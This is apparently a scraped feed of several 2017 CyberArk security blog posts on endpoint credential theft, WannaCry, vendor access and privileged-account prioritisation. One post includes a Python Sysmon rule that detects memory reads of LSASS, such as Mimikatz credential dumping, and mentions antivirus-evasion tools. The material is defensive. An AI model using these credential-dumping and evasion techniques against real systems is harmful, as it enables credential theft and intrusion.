Editor’s note: Conjur is part of the comprehensive CyberArk Privileged Account Security Solution, which helps organizations protect, monitor, detect, alert and respond to privileged account activity from mainframe to the cloud. To learn about Conjur Enterprise, please visit here.

 

]]>
Securing Your Cloud Environment: Six Critical Use Cases to Consider https://www.cyberark.com/blog/securing-cloud-environment-six-critical-use-cases-consider/ Tue, 05 Sep 2017 13:28:32 +0000 https://www.cyberark.com/?p=16549/

Migration to the cloud continues to accelerate as organizations increasingly take advantage of its many benefits—from efficiency and flexibility to competitive advantage and strategic value. In fact, 74 percent of chief financial officers at technology companies say cloud computing will have the most measurable impact on their business this year.

Here are some industry stats and predictions around this movement:

  • Cloud computing spending has grown at 4.5 times the rate of overall IT spending since 2009 and is expected to grow at more than 6 times the rate of IT spending from 2015 through 2020. (Source: IDC White Paper, sponsored by Salesforce, The Salesforce Economy: Enabling 1.9 Million New Jobs and $389 Billion in New Revenue Over the Next Five Years, September 2016)
  • The worldwide public cloud services market will grow 18 percent in 2017 to $246.8B, up from $209.2B in 2016. (Source: Gartner1)
  • By the end of next year, spending on IT-as-a-Service will reach $547B. (Source: Deloitte)
  • Platform-as-a-Service (PaaS) adoption is predicted to be the fastest-growing sector of cloud platforms, growing from 32 percent adoption in 2017 to 56 percent by 2020. (Source: KPMG)
  • Microsoft Azure adoption increased from 26 percent in 2016 to 43 percent in 2017, while AWS adoption increased from 56 percent to 59 percent. (Source: RightScale)

The business benefits of the cloud are very real, but so are the vulnerabilities that exist within cloud workloads such as unprotected privileged accounts, credentials and secrets. That’s why security must play an integral role in any cloud strategy and be viewed as a shared responsibility between public cloud vendors and their customers. This is particularly important as more organizations leverage cloud to save on costs, access on-demand compute and turn to DevOps processes to increase their business agility.

While each organization’s cloud journey is different, there are a number of best practices that will likely need to be addressed to help ensure cloud workloads and infrastructures are secure. Our just-released eBook, 6 Key Use Cases for Securing Your Organization’s Cloud Workloads, outlines several important approaches organizations should take to secure their cloud workloads. The use cases are based upon our experiences of working with customers in the field.  Download it for free and visit cyberark.com/cloud for more information about how CyberArk can help your organization secure its cloud environments.

 

1 Gartner Press Release, Gartner Says Worldwide Public Cloud Services Market to Grow 18 Percent in 2017, February 2017, http://www.gartner.com/newsroom/id/3616417
]]>
How do you spell Credential Theft Protection…EPP, NGAV, or EPM? https://www.cyberark.com/blog/spell-credential-theft-protectionepp-ngav-epm/ Wed, 30 Aug 2017 13:45:44 +0000 https://www.cyberark.com/?p=16469

It’s 2017, and time to realize that cyber attackers have the advantage of time, resources and motivation. They have progressed to the point where they test new tactics against the same software you likely use to detect threats in the first place: common anti-virus (AV) and endpoint protection (EPP) suites are used to tune malware so that it evades detection on the very desktops, laptops and servers you want to protect. While that is not new, the use of tools such as Shellter, OWASP-ZSC or Veil-Evasion is changing the game. With these tools, attackers can take an exploit-capable payload and encode it so that signature-based detection by anti-virus products and similar approaches fails to catch it. These shadow developers then test for detection against several of the most prevalent AV scanners, often using the very online scanners their targets rely on to protect corporate assets.

This modernization of the attackers’ software development process has helped these miscreants deploy some of the most polymorphic software kits available. While I am not trying to draw a direct connection to newer software development approaches such as DevOps, the streamlined approaches attackers have adopted to evade detection are rather similar. As a result, traditional static-signature methods for detecting viruses, malware and APTs are past their prime. Attackers are simply too quick to generate a specific attack that they know you will likely not detect, because it leverages a known vulnerability you likely didn’t patch and does so with an approach unique to you. On top of that, it was likely validated as undetectable by the very AV suite you depend on to protect what you hold most dear.

Not going to fall for the banana in the tail pipe

I know what you are thinking: you can do better than the traditional AV offered in EPP suites, right? You are saying to yourself, “We are not an organization that gets lulled into a false sense of security. (Sorry, Axel Foley.) We can install advanced, next-generation AV (NGAV) that’s powered by the cloud and provides cyber analytics and threat intelligence.”

Of course you could do this. But don’t fall for the hype. Why? There is a great quote by Chris Hoff about what to expect when you move your datacenter to the cloud: “If your security sucks now, you will be pleasantly surprised by the lack of change should you embrace the cloud.” Applied here: if you liked (or disliked) your endpoint security before, you are going to feel the same about a next-gen platform delivered from the cloud. OK, I will admit I may have hijacked that quote to illustrate a point: just because it’s cloud-deployed doesn’t mean it’s better.

What is important to note here is that using data analytics and intelligence sourced from a community to detect the likely footprints of an attacker is indeed a great idea, as long as your analytics work 100 percent of the time and you have 100 percent of the data required to provide context (i.e. the log data containing the digital footprints) in the first place. While your NGAV anomaly-detection system is “learning” what you do and figuring out normal from abnormal, you had best keep your fingers crossed and hope the double 100s always come up. We all know hope is not a strategy. (Better check the tailpipe.)

A defense-in-depth strategy is necessary when it comes to protecting endpoints on a network. The use of EPP or the security analytics in NGAV is therefore a complement to one of the key activities that all the security frameworks identify: hardening all of your systems. In its simplest terms, system hardening is about reducing the attack surface, or the potential for vulnerability, by first understanding all software and hardware, both authorized and unauthorized, on your network; second, taking appropriate measures to run only what is needed to operate; and third, continuously monitoring for vulnerabilities, applying updates to OS and application software and enforcing security policies such as password changes and timeouts. While some of these activities can be debated as forms of security control beyond hardening, hardening is not a one-and-done activity. It should be treated as a continuous process of ensuring a system (and its users) has only what it needs to do its job and nothing more.

AV products on the market today and the promises of NGAV do serve a purpose in providing another layer of endpoint protection, but they are weakened by only detecting what they know, or what they have data coverage and visibility for. By comparison, hardening with least privilege, application control with grey listing and credential theft protection reduces the attack surface far more significantly. Many cyber security frameworks (including the CIS Critical Security Controls) and industry analysts agree that implementing hardening is the most effective action to prevent malware. According to a recent Gartner report, “Endpoint hardening, including vulnerability, patch, privilege and policy management, and application control, is currently the most effective form of malware defense; however, most organizations are unwilling or unable to invest in the upfront effort required to reduce the attack surface.” (The Real Value of a Non-Signature-Based Anti-Malware Solution to Your Organization, 22 September 2016).

Why is system hardening so important?

System hardening across all of your endpoints is a necessary step (or set of steps, as outlined above): first gain an understanding of all assets, both hardware and software, and then take measures to reduce the attack surface by removing possible attack vectors. Hardening activities do not tie you to known attacks and, in fact, do not look for specific attackers. Hardening brings you back to the basics of protecting what attackers aim to steal: privilege. In fact, SANS’ most recent security survey identified credential compromise as the ultimate goal of attackers, and the report noted that privilege escalation caused the most impact. There is a step in nearly every attack that attackers strive to achieve: escalating privileges. The reason is simple: with administrative-level control over a resource, they stand a far better chance of accomplishing their objective.

The most common approach to gaining more privileges is credential theft against an administrative or privileged user account. Malware targets the credential stores on Windows systems, harvesting credentials from the logon process (LSASS), the Windows SAM, various email clients, SSH terminal sessions and browser-stored credentials. Examples of malware that carry out this harvesting include the phishing-delivered HawkEye keylogger and the often file-less, PowerShell-assisted use of Mimikatz. With a hardening strategy in place, the attacker’s ability to execute a targeted attack using either of these “living off the land” style attack vectors is severely diminished. Microsoft, to its credit, acknowledges the problem and has addressed part of it with Windows 10 Credential Guard, but that is a partial solution with known limitations and bypasses.

We have spoken previously about the value of least privilege and application control. Using these tactics can prevent many malware attacks from playing out. However, adopting an “assume breach” and “defense in depth” mindset, combined with credential store protection as a further hardening measure (one that can detect and block selectively at the application-process level), gives you a way to severely deter and contain an attack at the point of intrusion: the attacker cannot obtain the credentials required to pivot to another system. By way of introduction, CyberArk Endpoint Privilege Manager offers credential theft protection that helps you spell relief around credential theft.

To illustrate one of the more common credential theft attack vectors, I’ve included an example below of how a “living off the land,” file-less attack that uses PowerShell to load Mimikatz remotely is thwarted once CyberArk Endpoint Privilege Manager credential theft protection is activated.

The dialog above depicts how PowerShell is used to load Mimikatz and then successfully grab credentials from the LSASS process on Windows.

Once CyberArk Endpoint Privilege Manager activates credential theft protection on the LSASS process, the same attack simply fails.

Every attempt made to harvest credentials is captured within the CyberArk Endpoint Privilege Manager Eventlog. The dialog above showcases how both detect and block events on LSASS were logged within the CyberArk Endpoint Privilege Manager console.

Configuring credential theft protection within CyberArk Endpoint Privilege Manager is simple, providing granular control over various credential stores as depicted in the dialog below.
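The detect-and-block events shown above come from the product. As an added example that is not CyberArk code, the following Python implements the same detection idea from telemetry most Windows fleets already collect: Sysmon Event ID 10 (ProcessAccess) records every handle opened to another process, with the requesting image, the target image and the access mask granted. Reading LSASS memory requires PROCESS_VM_READ (0x0010), which is what Mimikatz needs and what ordinary applications have no reason to request. The rule flags any non-allow-listed process that obtains that right on lsass.exe and raises the severity when the call trace contains UNKNOWN frames, the mark of reflectively loaded code such as Invoke-Mimikatz running inside powershell.exe. The events below are constructed JSON lines using Sysmon’s field names; the allow list of legitimate LSASS readers is a starting point that has to be tuned to the endpoint’s own security agents.

```python
"""Flag processes that open lsass.exe for memory reads in Sysmon Event ID 10 data.

Added example, not CyberArk code. SAMPLE_EVENTS are constructed JSON lines using
Sysmon's ProcessAccess field names; the allow list is illustrative and must be
tuned per environment.
"""
import json

# Win32 process access rights relevant to credential dumping.
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_QUERY_LIMITED_INFORMATION = 0x1000

# System components and security agents that legitimately touch LSASS. Compared
# by image name only, because Event 10 carries no signer information; a renamed
# binary would slip through, so this list limits noise, it is not a trust decision.
ALLOWED_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "svchost.exe",
                   "msmpeng.exe", "wmiprvse.exe"}


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_memory_read(granted_access):
    """True if the granted mask lets the caller read the target's memory."""
    return bool(granted_access & PROCESS_VM_READ)


def classify(event):
    """Return an alert dict for a suspicious LSASS access, else None."""
    if event.get("EventID") != 10:
        return None
    if image_name(event["TargetImage"]) != "lsass.exe":
        return None
    granted = int(event["GrantedAccess"], 16)
    source = image_name(event["SourceImage"])
    if source in ALLOWED_SOURCES or not is_memory_read(granted):
        return None
    reasons = ["PROCESS_VM_READ on lsass.exe"]
    severity = "medium"
    if granted & PROCESS_VM_WRITE:
        reasons.append("PROCESS_VM_WRITE (can tamper with LSASS)")
    if "UNKNOWN" in event.get("CallTrace", ""):
        # Frames outside any loaded module: shellcode or a reflectively loaded
        # DLL, which is how Invoke-Mimikatz runs inside powershell.exe.
        reasons.append("call trace has UNKNOWN frames (reflective loading)")
        severity = "high"
    return {"time": event.get("UtcTime"), "source": source,
            "granted": hex(granted), "severity": severity, "reasons": reasons}


def detect(lines):
    """Run `classify` over JSON-lines Sysmon events and return the alerts."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        alert = classify(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed events; only the fields the rule reads are included.
SAMPLE_EVENTS = r"""
{"EventID": 10, "UtcTime": "2017-08-30 13:45:01", "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4a4"}
{"EventID": 10, "UtcTime": "2017-08-30 13:45:07", "SourceImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1010", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4a4|C:\\Windows\\System32\\KERNELBASE.dll+2bd3e|UNKNOWN(000001C6A3B20F1A)"}
{"EventID": 10, "UtcTime": "2017-08-30 13:45:09", "SourceImage": "C:\\Program Files\\Windows Defender\\MsMpEng.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1400", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4a4"}
{"EventID": 10, "UtcTime": "2017-08-30 13:45:15", "SourceImage": "C:\\Users\\bob\\Downloads\\procdump.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4a4|C:\\Windows\\System32\\KERNELBASE.dll+2bd3e"}
{"EventID": 10, "UtcTime": "2017-08-30 13:45:20", "SourceImage": "C:\\Windows\\System32\\notepad.exe", "TargetImage": "C:\\Windows\\explorer.exe", "GrantedAccess": "0x1010", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4a4"}
""".strip().splitlines()

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["severity"].upper(), a["time"], a["source"], a["granted"], "; ".join(a["reasons"]))
```

Detection of this kind tells you a dump was attempted; it does not stop it, which is the gap the blocking control described above closes. A rule like this still earns its place as the audit record that a block occurred somewhere the agent was not deployed or was disabled.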

If you are ready to get “back to basics” and see what credential theft protection can do for you, request a demo of CyberArk Endpoint Privilege Manager, the first Privileged Account Security solution for every desktop, laptop and server with credential theft protection built-in.


Editor’s note: Click here to listen to Laura Melton, senior information technology associate at Texas A&M University College of Architecture, about the importance of removing local administrator rights to strengthen endpoint security using CyberArk Endpoint Privilege Manager.

]]>
CyberArk & Proofpoint Integration: Real-Time Response to Suspicious Privileged User Activity https://www.cyberark.com/blog/cyberark-proofpoint-integration-real-time-response-suspicious-privileged-user-activity/ Mon, 28 Aug 2017 18:50:26 +0000 https://www.cyberark.com/?p=16379

As attack sophistication and frequency increase, the likelihood of an attacker breaching an organization’s defense has never been higher. Increasingly successful in their attempts, attackers seek privileged accounts to achieve their mission. Privileged accounts proliferate throughout an organization’s IT environment, granting access to highly sensitive resources and paving the path of successful cyber attacks. To prevent a threat from escalating into a full-blown security breach, security teams must prioritize alerts for privileged accounts, quickly investigate these critical threats and take immediate action to stop attackers in their tracks.

By integrating the CyberArk Privileged Account Security Solution with Proofpoint Threat Response, security analysts can rapidly disrupt critical, in-progress attacks involving privileged accounts. Here is a high-level overview of how our technology integration empowers organizations to focus their efforts and resources on the highest priority targets to identify the most significant risks.

Overcoming Alert Fatigue

Today’s security professionals are overwhelmed with alerts that require manual analysis (and ultimately, time) to validate and prioritize. This time presents an opportunity for attackers to exploit a system and gain privileged access—all before a complete investigation can be conducted.

Once a privileged account, such as domain or database administrator, is captured, an attacker can move laterally at-will, disabling security controls to avoid detection and persist long term. In fact, valid privileged access is one of the most effective tools an attacker can add to his/her arsenal. To mount an effective defense, security programs must be bolstered with automation capabilities to increase incident response efficiencies and decrease response time. This provides the visibility, context and response that matters most to an organization.

The Need for an Integrated Solution

Security teams seek solutions that provide context and enriched insight, as well as the tools needed to investigate, contain and remediate incidents. Multiple joint customers of CyberArk and Proofpoint requested we combine the incident response and automation of Proofpoint Threat Response together with the Privileged Account Security of CyberArk—and we listened. The way our integrated solution works is both simple and effective.

Real-Time Response to Suspicious Privileged User Activity

Proofpoint Threat Response is an incident response automation platform that provides analysts with alert enrichment, forensic collection and comparison as well as the ability to contain users, hosts and malicious emails—automatically or at the push of a button—without complex playbooks or custom scripts. In this joint solution with CyberArk, Proofpoint Threat Response receives an alert about malicious activity, from a correlated search in Splunk, for example, then automatically enriches the alert data with critical intelligence-driven context. Threat Response then validates the user account by email address or associated IP address, providing the full user identity and attributes such as department, job title or network access and takes action by synchronizing with relevant security groups in Active Directory.

The CyberArk Privileged Account Security Solution provides privileged credential protection, session security, least privilege and application control and continuous monitoring to rapidly detect threats and report on privileged account activity. In this integration, CyberArk automatically retrieves the user’s group affiliation from Active Directory and enforces controls on access to privileged accounts according to the organization’s policy. CyberArk also gives security teams the ability to provision custom access policies for restricted users. For example, a user can be blocked from accessing specific databases containing sensitive cardholder data while access to less sensitive databases remains valid.

The CyberArk solution can implement an organization’s policies that restrict a user’s access to critical assets only through CyberArk Privileged Session Manager, while blocking all other access options. The CyberArk Privileged Session Manager is a secure proxy server that separates endpoints from target systems and isolates privileged sessions to help prevent the exploitation of the critical system. This level of granularity provides an appropriate level of protection without significantly impacting operations or preventing employees from being productive.

Today’s security teams must do more with less and gain maximum benefit from the tools they already have. The partnership between CyberArk and Proofpoint provides joint customers with a combined best-in-class privileged account security solution and incident response automation and orchestration platform, stopping attackers before they stop business. The best part is this integrated solution is available to joint customers today—at no additional cost.

To learn more, watch our recent webcast/demo: “Proofpoint & CyberArk: Detect, Prioritize and Block Attacks from Escalating on Privileged User Machines.”

Editor’s Note: Tim Sullivan is a Threat Response Solutions Engineer at Proofpoint.

Locking Down the Remote Vendor Attack Pathway through Privileged Account Security https://www.cyberark.com/blog/locking-remote-vendor-attack-pathway-privileged-account-security/ Mon, 14 Aug 2017 13:44:56 +0000 https://www.cyberark.com/?p=16154

Remote vendors are everywhere, and they’re not limited to help desk services, storage and application service providers or other IT-focused MSPs. Let’s not forget about the other vendors a company typically works with – law firms, public relations firms, HVAC, trucking companies, supply chain vendors, services companies – the list goes on. Organizations both large and small grant third-party vendors access to their network and applications as a necessary means to do business. However, in doing this, they also introduce a potential new pathway for cyber attacks. This pathway can be especially vulnerable given that the security controls for third-party vendors are not typically held to the same standards as those followed internally by an organization.

Locking down privileged credentials for remote vendors is a critically important step in minimizing the attack surface. A recent report showed that 67 percent of organizations had experienced a data breach that somehow tied back to a third-party vendor. This is a clear indication that attackers continue to look at third parties as an easy way to gain a foothold into a network, move laterally, escalate privileges and eventually gain access to their target assets. Before engaging with third-party vendors, organizations should fully vet each one and consider the potential risks the vendor might introduce to their business.

Mitigating Risks Associated with Remote Vendors

The first step in mitigating risks associated with remote vendor access is an obvious one – identify all third parties that have access into your internal systems. This can represent a complex ecosystem for some organizations. The number of vendors given access to systems and applications continues to increase year over year, widening the threat landscape for attacks – and somehow remote vendor access management is still not considered a high priority for many organizations. CyberArk has a free tool that discovers privileged user accounts and credentials provisioned by your organization as well as those created by third parties (that perhaps you didn’t even know existed).

Organizations should be able to safely provide their remote vendors with access to the resources they need without exposing any user credentials and, at the same time, without introducing too many hoops for them to jump through. Storing the passwords, SSH keys and other credentials associated with your third-party privileged accounts in a single, secured vault is how you can provide the required level of access without burdening the end user. Keeping a close eye on all privileged activity within your environment is accomplished through session isolation, monitoring and recording. Doing this both secures all internal and external users and holds them to a baseline level of accountability. More importantly, by adding this separation layer between the end user and target systems, you enable your users to successfully complete their tasks without directly accessing critical systems. To the end user, everything appears to be totally normal, but if an attacker were to get into the network, they wouldn’t be able to move laterally across the environment or spread harmful malware to an organization’s systems.

Putting the Right Tools in Place

What about those regular and mundane manual tasks that can be inadvertently damaging to the business? Remember that recent public cloud outage where a routine debugging exercise went haywire, leading to a six-hour meltdown caused by one simple little typo? Automated privileged task management (both in the cloud and on-premises) safeguards your remote vendors and internal users alike by automating manual, sometimes critically sensitive privileged tasks while simultaneously improving workflow productivity. How would you respond to high-risk commands and tasks that can lead to a mix-up like the example above? With the right analytics tools in place, you can pre-define the high-risk commands that are unique to your organization and automatically notify the necessary security teams to take action when those commands have been executed. Furthermore, these tools can help you detect and even disrupt in-progress attacks through both heuristic and advanced behavioral threat detection capabilities.

The CyberArk Privileged Account Security Solution can help minimize the threat associated with third-party vendor management. Controlling and auditing each vendor’s access can be resource-intensive, causing meaningful activities to get lost in the shuffle. Therefore, it’s recommended to start with the areas that have the highest risk, such as access, privileged access and critical assets. CyberArk enables organizations to securely lock down remote vendor access and put the necessary security controls in place to enable third parties to safely complete tasks.

Learn more by downloading the Securing Remote Vendor Access with Privileged Account Security white paper. See how CyberArk can help to identify vulnerabilities in your organization and how you can better secure your privileged accounts against targeted attackers.

WannaCry Ransomware: A Brief Q&A with a CyberArk Labs Researcher https://www.cyberark.com/blog/wannacry-ransomware-brief-qa-cyberark-labs-researcher/ Mon, 07 Aug 2017 13:57:20 +0000 https://www.cyberark.com/?p=16055

In May, we offered a 30-minute webcast focused on deconstructing the WannaCry ransomware attack. Led by CyberArk Labs Researcher Shaked Reiner, the webcast delved into specifics of the attack, as well as proven methods organizations can implement to prevent WannaCry’s ability to spread through networks and encrypt system data. We’ve compiled some of the questions attendees asked Shaked during the session, and the highlights are shared here:

Q: Can you describe the propagation technique used by WannaCry?

A: The WannaCry ransomware’s technique is based upon code originally developed by the NSA and leaked by the hacker group known as Shadow Brokers. It uses a variant of the Shadow Brokers’ leaked exploit and utilizes strong encryption on files such as documents, images and videos. The ransomware was able to spread at an unprecedented rate via a sophisticated, built-in “worm” capability. Additionally, it specifically targets the MS17-010 SMB vulnerability in Microsoft systems that many people had left unpatched, and therefore, exposed.

Q: Which account does WannaCry use to install itself, and if the user does not have administrative privileges, shouldn’t that prevent WannaCry from installing itself?

A: This specific strain of ransomware is special in that aspect. Administrative privileges are not required to execute the initial infection. However, in order to propagate throughout the organization’s network, it needs to escalate privileges through the Microsoft vulnerability described above. After successfully exploiting this vulnerability, the ransomware has access to the highest tier of privileged credentials, enabling it to run code in the SYSTEM user context. WannaCry is then able to operate in an offline environment, encrypting the user’s files with an RSA-2048 key pair. After the encryption process, the ransomware demands $300-$600 in Bitcoin to decrypt the files.

Q: Why can’t Bitcoin payments be tracked?

A: Bitcoin is often described as an anonymous currency because it is possible to send and receive Bitcoins without sharing any personally identifying information. It works by leveraging digital wallets untethered to a central management or processing system. This allows each digital wallet to operate independently, and it makes tracking and identification of the wallet holder incredibly difficult.

Q: How is it possible to detect and block such an attack?

A: Our CyberArk Labs team conducts ransomware testing daily to help organizations better prepare for such attacks. Based upon tests of more than 600,000 ransomware samples (including WannaCry), the team has found that the combination of enforcing least privilege on endpoints and application greylisting control is 100 percent effective in preventing ransomware in general, and WannaCry specifically, from encrypting files.

CyberArk Endpoint Privilege Manager helps organizations remove common barriers to enforcing least privilege, such as user productivity loss and increased burden on IT teams. It also allows organizations to block and contain attacks at the endpoint, reducing the risk of information being stolen or encrypted and held for ransom. A combination of privilege security and application control reduces the risk of malware infection. Unknown applications can run in a restricted mode to contain threats while maintaining productivity, and behavioral analysis identifies and blocks credential theft attempts. These critical prevention and protection technologies are deployed as a single agent to strengthen existing endpoint security.

Q: How difficult is it to create malware such as WannaCry?

A: It’s important to separate the two components of this malware to answer this question. In the case of WannaCry, the ransomware component itself was very ordinary – there are a few open-source ransomware families widely available on the internet, and one does not need advanced programming knowledge to figure out how to compile one. What makes WannaCry unique and viral in nature is the highly sophisticated worm component that allows it to spread as quickly as possible to as many machines as possible. It’s likely two malware authors were involved in the creation of WannaCry, as the infection component is so advanced, while the ransomware itself is not overly sophisticated.

Q: Are there any additional tools from the NSA leak that could lead to another attack of this magnitude and scale?

A: Yes. The Shadow Brokers group offers a monthly subscription program that promises more data will be released from the NSA leak. It’s important to note that the previous leak did not contain any exploits’ source code, so WannaCry was constructed by fully reverse-engineering the software that was released. This indicates that the attacker responsible for the WannaCry worm component was extremely sophisticated, as noted previously. The NSA leak most certainly contained more tools that savvy hackers may leverage to wreak additional, future havoc and harm.

To learn more about the WannaCry attack, we invite you to read our Labs Team’s full analysis, as well as five ways to mitigate ransomware risk.

Privileged Access Management: A Matrix Approach for Account Ranking and Prioritization https://www.cyberark.com/blog/privileged-access-management-matrix-approach-account-ranking-prioritization/ Wed, 02 Aug 2017 14:10:59 +0000 https://www.cyberark.com/?p=16027

Throughout the course of my six years in helping KPMG clients with their Privileged Access Management programs, there has rarely been a simple answer to the critical questions of exactly which privileged accounts in an environment should be integrated first (e.g., application/infrastructure/personal accounts), and exactly how we should control each type of privileged account. The ways an organization can control privileged accounts using a solution like CyberArk can vary greatly (e.g. vaulting, password rotation, brokering, etc.).

A common approach to password management is to treat all vaulted credentials with the same level of control measures; this is typically a symptom of the lack of a risk-based approach to assigning criticality to accounts. Alternatively, we also see cases of wild inconsistency in the way passwords are managed, typically because it is left up to the individual platform owners to pick and choose the security controls that suit them. This is typically an indication that there are no defined PAM standards that can be applied enterprise-wide. When developing strategies and roadmaps for KPMG clients, our teams apply an “Account Criticality Matrix” to help answer these questions. This matrix is designed to standardize the way we rate and weigh the criticality of a given account. It includes a set of predefined criteria that we tailor to meet the unique needs of each organization. Example criteria in the Account Criticality Matrix include:

*   Number of individuals that have access to a given privileged credential
*   Frequency of account usage
*   Potential to access sensitive data
*   Scope of privilege across single/multiple systems or platforms
*   Control level granted

Based on the numerical scoring derived from the Account Criticality Matrix, we then begin to build a profile of what an organization would consider a “high-risk” account versus a “low-risk” account. This profile helps on numerous fronts. First, it allows for consideration of account types that typically would not be considered as true “privileged” accounts. For example, many application or service accounts are inadvertently excluded from management in organizations due to a lack of understanding of enterprise privileged account definitions by the application owner. In the absence of pre-defined account prioritization criteria, those owners are left to decide what constitutes a “privileged” account or not. Many will opt for the latter without prescribed guidance. The matrix will allow an organization to take any account type and provide a standardized metric to determine whether it meets the criteria to be integrated into CyberArk.

The second benefit is the standardization of account controls across the organization based on the calculated account criticality. Depending on licensing and hardware limitations, recording all privileged accounts may not be feasible. Based on a pre-defined policy, an organization could mandate that only “high” rated accounts require dual control and PSM recording, but periodic password rotations of “medium” rated credentials are sufficient.

Thirdly, combining knowledge of “high” severity accounts with implementation effort provides a basis for prioritizing the order of integration. When various stakeholders ask why the decision was made to start with default local accounts first and not their specialized application, you can point not only to the fact that those accounts rated as high based on the user base, scope of privilege and access granted, but also to the fact that the implementation effort was lowest for those accounts.
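To make the matrix concrete, here is an added worked example in Python (illustrative only, not KPMG’s or CyberArk’s actual scoring model). It scores the five criteria listed above on a 1–3 scale, applies weights, maps the total to a high/medium/low tier carrying the control set described in this post (dual control and PSM recording for “high”, periodic rotation for “medium”), and orders onboarding by tier and implementation effort. The weights, thresholds, control names and sample accounts are all assumptions.

```python
"""Worked Account Criticality Matrix: each criterion from the post is scored
1-3, weighted and summed; the total maps to a risk tier and the tier to a
control set. Added illustration, not KPMG's or CyberArk's model: weights,
thresholds and sample accounts are assumptions."""

from __future__ import annotations
from dataclasses import dataclass

# The five criteria named in the post, each scored 1 (low) to 3 (high).
CRITERIA = ("user_count", "usage_frequency", "sensitive_data",
            "privilege_scope", "control_level")

# Assumed weights: data sensitivity, breadth of privilege and control level
# count for more than how often the account is used.
WEIGHTS = {"user_count": 2, "usage_frequency": 1, "sensitive_data": 3,
           "privilege_scope": 3, "control_level": 3}
MAX_SCORE = 3 * sum(WEIGHTS.values())  # 36 with the weights above

# Control sets per tier, following the post's example policy.
CONTROLS = {
    "high": ("vault", "rotate", "dual_control", "psm_recording"),
    "medium": ("vault", "rotate"),
    "low": ("vault",),
}
TIER_RANK = {"high": 0, "medium": 1, "low": 2}


@dataclass(frozen=True)
class Account:
    name: str
    user_count: int             # 1 single owner, 2 small team, 3 widely shared
    usage_frequency: int        # 1 rare, 2 weekly, 3 daily or continuous
    sensitive_data: int         # 1 none, 2 internal, 3 regulated (e.g. cardholder data)
    privilege_scope: int        # 1 single host, 2 one platform, 3 cross-platform / forest-wide
    control_level: int          # 1 read-only, 2 operator, 3 full admin or root
    implementation_effort: int  # 1 low (e.g. default local accounts) .. 3 high


def criticality_score(acct: Account) -> int:
    """Weighted sum of the five criteria; rejects out-of-range inputs."""
    for c in CRITERIA:
        v = getattr(acct, c)
        if not 1 <= v <= 3:
            raise ValueError(f"{acct.name}: {c}={v} is outside 1..3")
    return sum(WEIGHTS[c] * getattr(acct, c) for c in CRITERIA)


def tier(score: int) -> str:
    """Assumed thresholds: top quarter of the range is high, top half is medium."""
    if score >= 0.75 * MAX_SCORE:   # >= 27
        return "high"
    if score >= 0.5 * MAX_SCORE:    # >= 18
        return "medium"
    return "low"


def required_controls(acct: Account) -> tuple[str, ...]:
    return CONTROLS[tier(criticality_score(acct))]


def integration_order(accounts: list[Account]) -> list[str]:
    """Onboarding order: highest tier first, lowest implementation effort
    within a tier, then raw score. This is why a default local admin account
    can precede a higher-scoring domain admin account, as the post describes."""
    ranked = sorted(accounts, key=lambda a: (TIER_RANK[tier(criticality_score(a))],
                                             a.implementation_effort,
                                             -criticality_score(a), a.name))
    return [a.name for a in ranked]


# Constructed sample accounts (scores in comments use the weights above).
SAMPLE_ACCOUNTS = [
    Account("local_admin", 3, 2, 2, 2, 3, implementation_effort=1),   # 29 -> high
    Account("domain_admin", 2, 3, 3, 3, 3, implementation_effort=2),  # 34 -> high
    Account("erp_app_svc", 1, 3, 3, 1, 2, implementation_effort=3),   # 23 -> medium
    Account("monitor_ro", 2, 3, 1, 1, 1, implementation_effort=1),    # 16 -> low
]

if __name__ == "__main__":
    for a in SAMPLE_ACCOUNTS:
        s = criticality_score(a)
        print(f"{a.name:13} score={s:2} tier={tier(s):6} controls={required_controls(a)}")
    print("integration order:", integration_order(SAMPLE_ACCOUNTS))
```

Note that the application service account lands in the “medium” tier even though its owner might never have called it “privileged”; that is the first benefit described above, and the ordering function shows the third.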


Art Chaisiriwatanasai is a Director within KPMG’s Chicago office and is a member of their IT Advisory – Cyber practice. Art has in-depth experience in information security focusing on privileged access management, security operation center implementations, vulnerability management, risk assessment, and incident response initiatives.


Some or all of the services described herein may not be permissible for KPMG audit clients and their affiliates.

© 2017 KPMG LLP, a Delaware limited liability partnership and the U.S. member firm of the KPMG network of independent member firms affiliated with KPMG International Cooperative (“KPMG International”), a Swiss entity. All rights reserved. [Printed in the US].The KPMG name and logo are registered trademarks or trademarks of KPMG International. The information contained herein is of a general nature and is not intended to address the circumstances of any particular individual or entity. Although we endeavor to provide accurate and timely information, there can be no guarantee that such information is accurate as of the date it is received or that it will continue to be accurate in the future. No one should act upon such information without appropriate professional advice after a thorough examination of the particular situation.

Five Things to Know about Ransomware https://www.cyberark.com/blog/five-things-know-ransomware/ Mon, 31 Jul 2017 13:10:05 +0000 https://www.cyberark.com/?p=16003

With WannaCry barely in the rear-view mirror, ransomware was back in the spotlight with a new malware strain dubbed NotPetya. We can expect to see new ransomware strains as advanced attackers continue to evolve their tactics, and the ramifications for business will be significant if proactive measures are not taken. In previous posts, we’ve deconstructed ransomware and offered mitigation tips. To protect your organization, it’s important to be informed and have baseline knowledge.

Here are five things to know about ransomware:

